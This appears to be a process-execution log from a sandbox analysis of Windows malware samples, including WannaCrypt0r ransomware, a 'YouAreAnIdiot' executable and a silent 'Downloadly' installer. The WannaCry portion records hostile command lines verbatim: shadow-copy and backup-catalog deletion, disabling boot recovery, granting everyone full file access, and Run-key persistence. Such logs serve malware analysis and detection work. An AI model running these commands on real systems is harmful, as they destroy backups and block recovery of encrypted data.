"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5296 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5468 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5500 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5816 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4628 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2600 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5756 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6092 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:2

C:\Users\Admin\Desktop\YouAreAnIdiot.exe

"C:\Users\Admin\Desktop\YouAreAnIdiot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 484 -ip 484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 1452

C:\Users\Admin\Desktop\YouAreAnIdiot.exe

"C:\Users\Admin\Desktop\YouAreAnIdiot.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4932 -ip 4932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 1436

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=2844 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5952 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1816,i,17112888613822522292,14980796764024261685,131072 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected]

"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\[email protected]"

C:\Windows\SysWOW64\attrib.exe

attrib +h .

C:\Windows\SysWOW64\icacls.exe

icacls . /grant Everyone:F /T /C /Q

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 14091708581259.bat

C:\Windows\SysWOW64\cscript.exe

cscript.exe //nologo m.vbs

C:\Windows\SysWOW64\attrib.exe

attrib +h +s F:\$RECYCLE

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected] co

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c start /b @[email protected] vs

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected] vs

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\TaskData\Tor\taskhsvc.exe

TaskData\Tor\taskhsvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "sjlfnnfcj325" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "sjlfnnfcj325" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\tasksche.exe\"" /f

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff841823cb8,0x7ff841823cc8,0x7ff841823cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5516 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5548 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2336 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4544 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1020 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe"

C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VING0.tmp\x2s443bc.cs1.tmp" /SL5="$502F4,15784509,779776,C:\Users\Admin\AppData\Local\Temp\Temp1_Downloadly.zip\x2s443bc.cs1.exe"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

"C:\Users\Admin\Programs\Downloadly\Downloadly.exe" EnablePro

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp

"C:\Users\Admin\AppData\Local\Temp\is-0QSEL.tmp\MassiveInstaller.tmp" /SL5="$30372,10474064,1082880,C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Massive.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im MassiveUI.exe

C:\Users\Admin\Programs\Massive\Massive.exe

"C:\Users\Admin\Programs\Massive\Massive.exe"

C:\Users\Admin\Programs\Massive\crashpad_handler.exe

C:\Users\Admin\Programs\Massive\crashpad_handler.exe --no-rate-limit --database=C:\Users\Admin\AppData\Local\Massive\crashdumps --metrics-dir=C:\Users\Admin\AppData\Local\Massive\crashdumps --url=https://o428832.ingest.sentry.io:443/api/5375291/minidump/?sentry_client=sentry.native/0.4.9&sentry_key=5647f16acff64576af0bbfb18033c983 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-event --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-breadcrumb1 --attachment=C:\Users\Admin\AppData\Local\Massive\crashdumps\724bc23a-1868-45b8-bcc8-4c549b4eb69b.run\__sentry-breadcrumb2 --initial-client-data=0x434,0x438,0x43c,0x410,0x440,0x7ff618692fe0,0x7ff618692fa0,0x7ff618692fb0

C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe

"C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LVJ3B.tmp\downloadly_installer.tmp" /SL5="$403B6,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-f05ff7f4-69af-41fd-8644-e7e8675ce157\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe

"C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Downloadly.exe

C:\Users\Admin\AppData\Local\Temp\is-F71EK.tmp\downloadly_installer.tmp

"C:\Users\Admin\AppData\Local\Temp\is-F71EK.tmp\downloadly_installer.tmp" /SL5="$503AE,15992205,779776,C:\Users\Admin\AppData\Local\Temp\Update-9a174110-a467-4701-9b4d-55cbd1c46f5b\downloadly_installer.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /LOG

C:\Users\Admin\Programs\Downloadly\Downloadly.exe

"C:\Users\Admin\Programs\Downloadly\Downloadly.exe"

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe

C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp

